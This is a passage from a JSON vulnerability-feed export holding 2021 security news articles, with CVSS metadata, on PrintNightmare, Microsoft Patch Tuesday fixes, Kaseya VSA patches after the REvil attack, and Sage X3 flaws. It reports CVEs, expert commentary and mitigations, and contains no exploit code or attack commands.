[an update](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>) issued alongside the [August Patch Tuesday updates](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>) (which itself detailed three additional Print Spooler vulnerabilities, one critical).\n\n## **How to Protect Systems from Print Spooler Attacks**\n\nAs mentioned, there\u2019s no patch yet for the bug, but users can protect themselves by simply stopping and disabling the Print Spooler service:\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/12073406/Windows-Zero-Day-Workaround.png)\n\nSource: Microsoft.\n\nCERT/CC also said that since public exploits for Print Spooler attacks use the SMB file-sharing service for remote connectivity to a malicious shared printer, blocking outbound connections to SMB resources would thwart some attacks by blocking malicious SMB printers that are hosted outside of the network.\n\n\u201cHowever, Microsoft indicates that printers can be shared via the Web Point-and-Print Protocol, which may allow installation of arbitrary printer drivers without relying on SMB traffic,\u201d according to CERT/CC. \u201cAlso, an attacker local to your network would be able to share a printer via SMB, which would be unaffected by any outbound SMB traffic rules.\u201d\n\nIn its update advisory for CVE-2021-34481, Microsoft also detailed how to amend the default Point and Print functionality, which prevents non-administrator users from installing or updating printer drivers remotely and which could help mitigate the latest zero-day.\n\n![Threatpost Webinar Series ](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/27093135/threatpost-webinar-300x51.jpg)Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T13:19:50", "type": "threatpost", "title": "Microsoft Warns: Another Unpatched PrintNightmare Zero-Day", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-08-12T13:19:50", "id": "THREATPOST:ADA9E95C8FD42722E783C74443148525", "href": "https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-11T19:56:07", "description": "Microsoft has patched 51 security vulnerabilities in its scheduled August Patch Tuesday update, including seven critical bugs, two issues that were publicly disclosed but unpatched until now, and one that\u2019s listed as a zero-day that has been exploited in the wild.\n\nOf note, there are 17 elevation-of-privilege (EoP) vulnerabilities, 13 remote code-execution (RCE) issues, eight information-disclosure flaws and two denial-of-service (DoS) bugs.\n\nThe update also includes patches for three more Print Spooler bugs, familiar from the PrintNightmare saga.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/>)\n\n\u201cFortunately, it was a lighter month than usual,\u201d said Eric Feldman, senior product marketing manager at Automox, in a [Patch Tuesday analysis](<https://blog.automox.com/automox-experts-weigh-in-august-patch-tuesday-2021>) from the vendor. \u201cThis represents a 56 percent reduction in overall vulnerabilities from July, and 33 percent fewer vulnerabilities on average for each month so far this year. We have also seen a similar reduction in critical vulnerabilities this month, with 30 percent less compared to the monthly average.\u201d\n\n## **Windows Critical Security Vulnerabilities**\n\nThe seven critical bugs [addressed in August](<https://msrc.microsoft.com/update-guide/>) are as follows:\n\n * CVE-2021-26424 \u2013 Windows TCP/IP RCE Vulnerability\n * CVE-2021-26432 \u2013 Windows Services for NFS ONCRPC XDR Driver RCE Vulnerability\n * CVE-2021-34480 \u2013 Scripting Engine Memory Corruption Vulnerability\n * CVE-2021-34530 \u2013 Windows Graphics Component RCE Vulnerability\n * CVE-2021-34534 \u2013 Windows MSHTML Platform RCE Vulnerability\n * CVE-2021-34535 \u2013 Remote Desktop Client RCE Vulnerability\n * CVE-2021-36936 \u2013 Windows Print Spooler RCE Vulnerability\n\nThe bug tracked as **CVE-2021-26424** exists in the TCP/IP protocol stack identified in Windows 7 and newer Microsoft operating systems, including servers.\n\n\u201cDespite its CVSS rating of 9.9, this may prove to be a trivial bug, but it\u2019s still fascinating,\u201d said Dustin Childs of Trend Micro\u2019s Zero Day Initiative (ZDI) in his [Tuesday analysis](<https://www.zerodayinitiative.com/blog/2021/8/10/the-august-2021-security-update-review>). \u201cAn attacker on a guest Hyper-V OS could execute code on the host Hyper-V server by sending a specially crafted IPv6 ping. This keeps it out of the wormable category. Still, a successful attack would allow the guest OS to completely take over the Hyper-V host. While not wormable, it\u2019s still cool to see new bugs in new scenarios being found in protocols that have been around for years.\u201d\n\nThe next bug, **CVE-2021-26432** in Windows Services, is more likely to be exploited given its low complexity status, according to Microsoft\u2019s advisory; it doesn\u2019t require privileges or user interaction to exploit, but Microsoft offered no further details.\n\n\u201cThis may fall into the \u2018wormable\u2019 category, at least between servers with NFS installed, especially since the open network computing remote procedure call (ONCRPC) consists of an External Data Representation (XDR) runtime built on the Winsock Kernel (WSK) interface,\u201d Childs said. \u201cThat certainly sounds like elevated code on a listening network service. Don\u2019t ignore this patch.\u201d\n\nAleks Haugom, product marketing manager at Automox, added, \u201cExploitation results in total loss of confidentiality across all devices managed by the same security authority. Furthermore, attackers can utilize it for denial-of-service attacks or to maliciously modify files. So far, no further details have been divulged by Microsoft or the security researcher (Liubenjin from Codesafe Team of Legendsec at Qi\u2019anxin Group) that discovered this vulnerability. Given the broad potential impact, its label \u2018Exploitation More Likely\u2019 and apparent secrecy, patching should be completed ASAP.\u201d\n\nMeanwhile, the memory-corruption bug (**CVE-2021-34480**) arises from how the scripting engine handles objects in memory, and it also allows RCE. Using a web-based attack or a malicious file, such as a malicious landing page or phishing email, attackers can use this vulnerability to take control of an affected system, install programs, view or change data, or create new user accounts with full user rights.\n\n\u201cCVE-2021-34480 should also be a priority,\u201d Kevin Breen, director of cyber-threat research at Immersive Labs, told Threatpost. \u201cIt is a low score in terms of CVSS, coming in at 6.8, but has been marked by Microsoft as \u2018Exploitation More Likely\u2019 because it is the type of attack commonly used to increase the success rate of spear phishing attacks to gain network access. Simple, but effective.\u201d\n\nThe Windows Graphic Component bug (**CVE-2021-34530**) allows attackers to remotely execute malicious code in the context of the current user, according to Microsoft \u2013 if they can social-engineer a target into opening a specially crafted file.\n\nAnother bug exists in the Windows MSHTML platform, also known as Trident (**CVE-2021-34534**). Trident is the rendering engine (mshtml.dll) used by Internet Explorer. The bug affects many Windows 10 versions (1607, 1809,1909, 2004, 20H2, 21H1) as well as Windows Server 2016 and 2019.\n\nBut while it potentially affects a large number of users, exploitation is not trivial.\n\n\u201cTo exploit, a threat actor would need to pull off a highly complex attack with user interaction \u2013 still entirely possible with the sophisticated attackers of today,\u201d said Peter Pflaster, technical product marketing manager at Automox.\n\nThe bug tracked as **CVE-2021-34535** impacts the Microsoft Remote Desktop Client, Microsoft\u2019s nearly ubiquitous utility for connecting to remote PCs.\n\n\u201cWith today\u2019s highly dispersed workforce, CVE-2021-34535, an RCE vulnerability in Remote Desktop Clients, should be a priority patch,\u201d said Breen. \u201cAttackers increasingly use RDP access as the tip of the spear to gain network access, often combining it with privilege escalation to move laterally. These can be powerful as, depending on the method, it may allow the attacker to authenticate in the network in the same way a user would, making detection difficult.\u201d\n\nIt\u2019s not as dangerous of a bug [as BlueKeep,](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) according to Childs, which also affected RDP.\n\n\u201cBefore you start having flashbacks to BlueKeep, this bug affects the RDP client and not the RDP server,\u201d he said. \u201cHowever, the CVSS 9.9 bug is nothing to ignore. An attacker can take over a system if they can convince an affected RDP client to connect to an RDP server they control. On Hyper-V servers, a malicious program running in a guest VM could trigger guest-to-host RCE by exploiting this vulnerability in the Hyper-V Viewer. This is the more likely scenario and the reason you should test and deploy this patch quickly.\u201d\n\n## **Windows Print Spooler Bugs \u2013 Again**\n\nThe final critical bug is **CVE-2021-36936**, a Windows Print Spooler RCE bug that\u2019s listed as publicly known.\n\nPrint Spooler made headlines last month, when Microsoft patched what it thought was a minor elevation-of-privilege vulnerability in the service (CVE-2021-1675). But the listing was updated later in the week, after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE \u2013 [requiring a new patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>).\n\nIt also disclosed a second bug, similar to PrintNightmare (CVE-2021-34527); and a third, [an EoP issue](<https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/>) ([CVE-2021-34481](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>)).\n\n\u201cAnother month, another remote code-execution bug in the Print Spooler,\u201d said ZDI\u2019s Childs. \u201cThis bug is listed as publicly known, but it\u2019s not clear if this bug is a variant of PrintNightmare or a unique vulnerability all on its own. There are quite a few print-spooler bugs to keep track of. Either way, attackers can use this to execute code on affected systems. Microsoft does state low privileges are required, so that should put this in the non-wormable category, but you should still prioritize testing and deployment of this critical-rated bug.\u201d\n\nThe critical vulnerability is just one of three Print Spooler issues in the August Patch Tuesday release.\n\n\u201cThe specter of the PrintNightmare continues to haunt this patch Tuesday with three more print spooler vulnerabilities, CVE-2021-36947, CVE-2021-36936 and CVE-2021-34481,\u201d said Breen. \u201cAll three are listed as RCE over the network, requiring a low level of access, similar to PrintNightmare. Microsoft has marked these as \u2018Exploitation More Likely\u2019 which, if the previous speed of POC code being published is anything to go by, is certainly true.\u201d\n\n## **RCE Zero-Day in Windows Update Medic Service **\n\nThe actively exploited bug is tracked as **CVE-2021-36948** and is rated as important; it could pave the way for RCE via the Windows Update Medic Service in Windows 10 and Server 2019 and newer operating systems.\n\n\u201cUpdate Medic is a new service that allows users to repair Windows Update components from a damaged state such that the device can continue to receive updates,\u201d Automox\u2019 Jay Goodman explained. \u201cThe exploit is both low complexity and can be exploited without user interaction, making this an easy vulnerability to include in an adversary\u2019s toolbox.\u201d\n\nImmersive\u2019s Breen added, \u201cCVE-2021-36948 is a privilege-escalation vulnerability \u2013 the cornerstone of modern intrusions as they allow attackers the level of access to do things like hide their tracks and create user accounts. In the case of ransomware attacks, they have also been used to ensure maximum damage.\u201d\n\nThough the bug is being reported as being exploited in the wild by Microsoft, activity appears to remain limited or targeted: \u201cWe have seen no evidence of it at Kenna Security at this time,\u201d Jerry Gamblin, director of security research at Kenna Security (now part of Cisco) told Threatpost.\n\n## **Publicly Known Windows LSA Spoofing Bug**\n\nThe second publicly known bug (after the Print Spooler issue covered earlier) is tracked as **CVE-2021-36942**, and it\u2019s an important-rated Windows LSA (Local Security Authority) spoofing vulnerability.\n\n\u201cIt fixes a flaw that could be used to steal NTLM hashes from a domain controller or other vulnerable host,\u201d Immersive\u2019s Breen said. \u201cThese types of attacks are well known for lateral movement and privilege escalation, as has been demonstrated recently by a [new exploit called PetitPotam](<https://threatpost.com/microsoft-petitpotam-poc/168163/>). It is a post-intrusion exploit \u2013 further down the attack chain \u2013 but still a useful tool for attackers.\u201d\n\nChilds offered a bit of context around the bug.\n\n\u201cMicrosoft released this patch to further protect against NTLM relay attacks by issuing this update to block the LSARPC interface,\u201d he said. \u201cThis will impact some systems, notably Windows Server 2008 SP2, that use the EFS API OpenEncryptedFileRawA function. You should apply this to your Domain Controllers first and follow the additional guidance in [ADV210003](<https://msrc.microsoft.com/update-guide/vulnerability/ADV210003>) and [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>). This has been an ongoing issue since 2009, and, likely, this isn\u2019t the last we\u2019ll hear of this persistent issue.\u201d\n\nMicrosoft\u2019s next Patch Tuesday will fall on September 14.\n\n![Threatpost Webinar Series ](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/27093135/threatpost-webinar-300x51.jpg)Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T21:17:58", "type": "threatpost", "title": "Actively Exploited Windows Zero-Day Gets a Patch", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26424", "CVE-2021-26432", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34527", "CVE-2021-34530", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-36936", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2021-08-10T21:17:58", "id": "THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "href": "https://threatpost.com/exploited-windows-zero-day-patch/168539/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-13T22:17:17", "description": "Three bugs under active exploit were squashed by Microsoft Tuesday, part of its [July security roundup](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jul>) of fixes for Windows, Microsoft Office, SharePoint Server and Exchange Server. In all, Microsoft patched 116 bugs. Twelve bugs are rated critical, 103 rated important and one classified as moderate in severity.\n\nBugs under active attack include a critical scripting engine memory corruption ([CVE-2021-34448](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34448>)) flaw and two additional Windows kernel elevation-of-privilege vulnerabilities ([CVE-2021-31979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31979>), [CVE-2021-33771](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33771>)), both with a severity rating of important. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)The hundred-plus bug fixes add to a rough July for Microsoft, which rolled out an out-of-band fix for a Windows print spooler remote-code-execution vulnerability ([CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>)), dubbed [PrintNightmare](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>), earlier this month. The nightmare bug, first disclosed in April, was later discovered to be more serious than initially thought.\n\n## **Public, But Not Exploited **\n\nFive of the bugs patched by Microsoft ([CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-33781](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33781>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>), [CVE-2021-33779](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33779>), [CVE-2021-34492](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34492>)) were publicly known, albeit not exploited. Only one of those bugs (CVE-2021-34473), a Microsoft Exchange Server remote code execution (RCE) vulnerability, has a severity rating of critical, with a CVSS score of 9.1. The bug, one of the highest rated in terms of importance to fix this month, was part of Microsoft\u2019s April Patch Tuesday roundup of fixes, according to commentary by [Cisco Talos](<https://blog.talosintelligence.com/2021/07/microsoft-patch-tuesday-for-july-2021.html>).\n\n\u201cThis vulnerability was already patched in Microsoft\u2019s April security update but was mistakenly not disclosed. Users who already installed the April 2021 update are already protected from this vulnerability, though it is worth noting that this issue was part of a series of zero-days in Exchange Server used in a wide-ranging APT attack,\u201d wrote Talos authors Jon Munshaw and Jaeson Schultz.\n\n## **Patching Priorities **\n\nThe most pressing of bugs is a memory corruption vulnerability (CVE-2021-34448) in Windows Server\u2019s scripting engine that is triggered when the user opens a specially crafted file, either attached to an email or a compromised website.\n\n\u201c[This bug] is the most serious vulnerability for me. It is elegant in its simplicity, letting an attacker gain remote code execution just by getting the target to visit a domain,\u201d wrote Kevin Breen, director of cyber threat research with Immersive Labs, in his Patch Tuesday commentary. \u201cWith malicious, yet professional looking, domains carrying valid TLS certificates a regular feature nowadays, seamless compromise would be a trivial matter. Victims could even be attacked by sending .js or .hta files in targeted phishing emails.\u201d\n\nCisco Talos advises system admin to prioritize a patch for a critical bug ([CVE-2021-34464](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34464>)) in Microsoft\u2019s free Defender anti-virus software. \u201cThis issue could allow an attacker to execute remote code on the victim machine. However, users do not need to take any actions to resolve this issue, as the update will automatically install. The company has listed steps in its advisory users can take to ensure the update is properly installed,\u201d wrote Munshaw and Schultz.\n\nResearchers have also identified three SharePoint Server bugs ([CVE-2021-34520](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34520>), [CVE-2021-34467](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34467>), [CVE-2021-34468](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34468>)) as priority patches. Each allow an attacker to execute remote code on the victim machine. All are rated important. However, Microsoft reports that exploitation is \u201cmore likely\u201d with these vulnerabilities, Talos said.\n\nZero Day Initiative\u2019s Dustin Childs recommends tackling ([CVE-2021-34458](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34458>)), a Windows kernel vulnerability. \u201cIt\u2019s rare to see remote code execution in a kernel bug, but this is that rare exception. This bug impacts systems hosting virtual machines with single root input/output virtualization (SR-IOV) devices,\u201d [he wrote](<https://www.zerodayinitiative.com/blog/2021/7/13/the-july-2021-security-update-review>).\n\n\u201cIt\u2019s not clear how widespread this configuration is, but considering this bug rates as a CVSS 9.9, it\u2019s not one to ignore. If you have virtual machines in your environment, test and patch quickly,\u201d Childs added.\n\nIn related news, [Adobe\u2019s July patch roundup](<https://threatpost.com/adobe-patches-critical-acrobat/167743/>), also released Tuesday, includes fixes for its ubiquitous and free PDF reader Acrobat 2020 and other software such as Illustrator and Bridge. In all, Adobe patched 20 Acrobat bugs, with nine rated important.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-13T21:26:27", "type": "threatpost", "title": "Microsoft Crushes 116 Bugs, Three Actively Exploited", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-31979", "CVE-2021-33771", "CVE-2021-33779", "CVE-2021-33781", "CVE-2021-34448", "CVE-2021-34458", "CVE-2021-34464", "CVE-2021-34467", "CVE-2021-34468", "CVE-2021-34473", "CVE-2021-34492", "CVE-2021-34520", "CVE-2021-34523", "CVE-2021-34527"], "modified": "2021-07-13T21:26:27", "id": "THREATPOST:98D815423018872E6E596DAA8131BF3F", "href": "https://threatpost.com/microsoft-crushes-116-bugs/167764/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:21", "description": "[![](https://thehackernews.com/images/-BuDOZJHtpp4/YOvGtVhVe7I/AAAAAAAADJc/k-syNb5yylI7XPNIuSCJP6bhQaEkNelXgCLcBGAsYHQ/s0/software-update.jpg)](<https://thehackernews.com/images/-BuDOZJHtpp4/YOvGtVhVe7I/AAAAAAAADJc/k-syNb5yylI7XPNIuSCJP6bhQaEkNelXgCLcBGAsYHQ/s0/software-update.jpg>)\n\nFlorida-based software vendor Kaseya on Sunday rolled out urgent updates to address critical security vulnerabilities in its Virtual System Administrator (VSA) solution that was used as a jumping off point to target as many as 1,500 businesses across the globe as part of a widespread [supply-chain ransomware attack](<https://thehackernews.com/2021/07/kaseya-rules-out-supply-chain-attack.html>).\n\nFollowing the incident, the company had urged on-premises VSA customers to shut down their servers until a patch was available. Now, almost 10 days later the firm has shipped [VSA version 9.5.7a (9.5.7.2994)](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041>) with fixes for three new security flaws \u2014 \n\n * **CVE-2021-30116** \\- Credentials leak and business logic flaw\n * **CVE-2021-30119** \\- Cross-site scripting vulnerability\n * **CVE-2021-30120** \\- Two-factor authentication bypass\n\nThe security issues are part of a total of seven vulnerabilities that were discovered and reported to Kaseya by the Dutch Institute for Vulnerability Disclosure ([DIVD](<https://thehackernews.com/2021/07/revil-used-0-day-in-kaseya-ransomware.html>)) earlier in April, of which four other weaknesses were remediated in previous releases \u2014\n\n * **CVE-2021-30117** \\- SQL injection vulnerability (Fixed in VSA 9.5.6)\n * **CVE-2021-30118** \\- Remote code execution vulnerability (Fixed in VSA 9.5.5)\n * **CVE-2021-30121** \\- Local file inclusion vulnerability (Fixed in VSA 9.5.6)\n * **CVE-2021-30201** \\- XML external entity vulnerability (Fixed in VSA 9.5.6)\n\nBesides fixes for the aforementioned shortcomings, the latest version also resolves three other flaws, including a bug that exposed weak password hashes in certain API responses to brute-force attacks as well as a separate vulnerability that could allow the unauthorized upload of files to the VSA server.\n\nFor additional security, Kaseya is [recommending](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403869952657>) limiting access to the VSA Web GUI to local IP addresses by blocking port 443 inbound on the internet firewall for on-premises installations.\n\nKaseya is also warning its customers that installing the patch would force all users to mandatorily change their passwords post login to meet new password requirements, adding that select features have been replaced with improved alternatives and that the \"release introduces some functional defects that will be corrected in a future release.\"\n\nBesides the roll out of the patch for on-premises versions of its VSA remote monitoring and management software, the company has also instantiated the reinstatement of its VSA SaaS infrastructure. \"The restoration of services is progressing according to plan, with 60% of our SaaS customers live and servers coming online for the rest of our customers in the coming hours,\" Kaseya [said](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) in a rolling advisory.\n\nThe latest development comes days after Kaseya cautioned that spammers are capitalizing on the ongoing ransomware crisis to send out fake email notifications that appear to be Kaseya updates, only to infect customers with Cobalt Strike payloads to gain backdoor access to the systems and deliver next-stage malware.\n\nKaseya has said multiple flaws were chained together in what it called a \"sophisticated cyberattack\", and while it isn't exactly clear how it was executed, it's believed that a combination of CVE-2021-30116, CVE-2021-30119, and CVE-2021-30120 was used to carry out the intrusions. REvil, a prolific ransomware gang based in Russia, has claimed responsibility for the incident.\n\nThe use of trusted partners like software makers or service providers like Kaseya to identify and compromise new downstream victims, often called a supply-chain attack, and pair it with file-encrypting ransomware infections has also made it one of the largest and most significant such attacks to date.\n\nInterestingly, Bloomberg on Saturday reported that five former Kaseya employees had flagged the company about \"glaring\" security holes in its software between 2017 and 2020, but their concerns were brushed off.\n\n\"Among the most glaring problems was software underpinned by outdated code, the use of weak encryption and passwords in Kaseya's products and servers, a failure to adhere to basic cybersecurity practices such as regularly patching software and a focus on sales at the expense of other priorities,\" the report [said](<https://www.bloomberg.com/news/articles/2021-07-10/kaseya-failed-to-address-security-before-hack-ex-employees-say>).\n\nThe Kaseya attack marks the third time that ransomware affiliates have abused Kaseya products as a vector to deploy ransomware.\n\nIn [February 2019](<https://www.reddit.com/r/msp/comments/ani14t/local_msp_got_hacked_and_all_clients_cryptolocked/>), the Gandcrab ransomware cartel \u2014 which later [evolved into Sodinokibi and REvil](<https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/>) \u2014 leveraged a vulnerability in a Kaseya plugin for the ConnectWise Manage software to deploy ransomware on the networks of MSPs' customer networks. Then in [June 2019](<https://www.reddit.com/r/msp/comments/c2wls0/kaseya_weaponized_to_deliver_sodinokibi_ransomware/>), the same group went after Webroot SecureAnywhere and Kaseya VSA products to infect endpoints with Sodinokibi ransomware.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-12T04:36:00", "type": "thn", "title": "Kaseya Releases Patches for Flaws Exploited in Widespread Ransomware Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30119", "CVE-2021-30120", "CVE-2021-30121", "CVE-2021-30201"], "modified": "2021-07-12T10:46:11", "id": "THN:1812C7168898D0993D0783FDC775739F", "href": "https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:21", "description": "[![Sage X3 Enterprise Management](https://thehackernews.com/images/-Gnu9lfBaWJo/YObgWiseQ6I/AAAAAAAADIk/93QJ3ZLav6IR71KHp1O_I1V70dhS8n2ggCLcBGAsYHQ/s728-e1000/erp-software.jpg)](<https://thehackernews.com/images/-Gnu9lfBaWJo/YObgWiseQ6I/AAAAAAAADIk/93QJ3ZLav6IR71KHp1O_I1V70dhS8n2ggCLcBGAsYHQ/s0/erp-software.jpg>)\n\nFour security vulnerabilities have been uncovered in the [Sage X3](<https://www.sage.com/en-us/sage-business-cloud/sage-x3/>) enterprise resource planning (ERP) product, two of which could be chained together as part of an attack sequence to enable adversaries to execute malicious commands and take control of vulnerable systems.\n\nThese issues were discovered by researchers from Rapid7, who notified Sage Group of their findings on Feb. 3, 2021. The vendor has since rolled out [fixes](<https://www.sagecity.com/gb/sage-x3-uk/f/sage-x3-uk-announcements-news-and-alerts/148233/sage-x3-version-11-june-2021>) in recent releases for Sage X3 Version 9 (Syracuse 9.22.7.2), Sage X3 HR & Payroll Version 9 (Syracuse 9.24.1.3), Sage X3 Version 11 (Syracuse 11.25.2.6), and Sage X3 Version 12 (Syracuse 12.10.2.8) that were shipped in March.\n\nThe list of vulnerabilities is as follows -\n\n * **CVE-2020-7388** (CVSS score: 10.0) - Sage X3 Unauthenticated Remote Command Execution (RCE) as SYSTEM in AdxDSrv.exe component\n * **CVE-2020-7389** (CVSS score\" 5.5) - System \"CHAINE\" Variable Script Command Injection (No fix planned)\n * **CVE-2020-7387** (CVSS score: 5.3) - Sage X3 Installation Pathname Disclosure\n * **CVE-2020-7390** (CVSS score: 4.6) - Stored XSS Vulnerability on 'Edit' Page of User Profile\n\n\"When combining CVE-2020-7387 and CVE-2020-7388, an attacker can first learn the installation path of the affected software, then use that information to pass commands to the host system to be run in the SYSTEM context,\" the researchers 